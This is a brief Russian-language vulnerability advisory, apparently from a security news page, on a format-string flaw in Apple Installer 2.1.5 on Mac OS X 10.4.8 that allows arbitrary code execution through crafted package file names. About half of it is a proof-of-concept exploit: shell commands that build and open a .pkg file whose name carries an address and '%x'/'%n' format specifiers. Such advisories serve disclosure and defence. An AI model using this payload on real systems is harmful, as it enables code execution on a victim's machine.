Программа:
Apple Installer 2.1.5
Mac OS X 10.4.8

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке имен файлов. Атакующий может выполнить произвольный код на целевой системе.

Пример:

$ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg
$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x %25x%25x%25x%25x%25x%25x%25x%25x%25x%25 x%25x%25x%25x%25x%25x%25x%25x%n.pkg

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии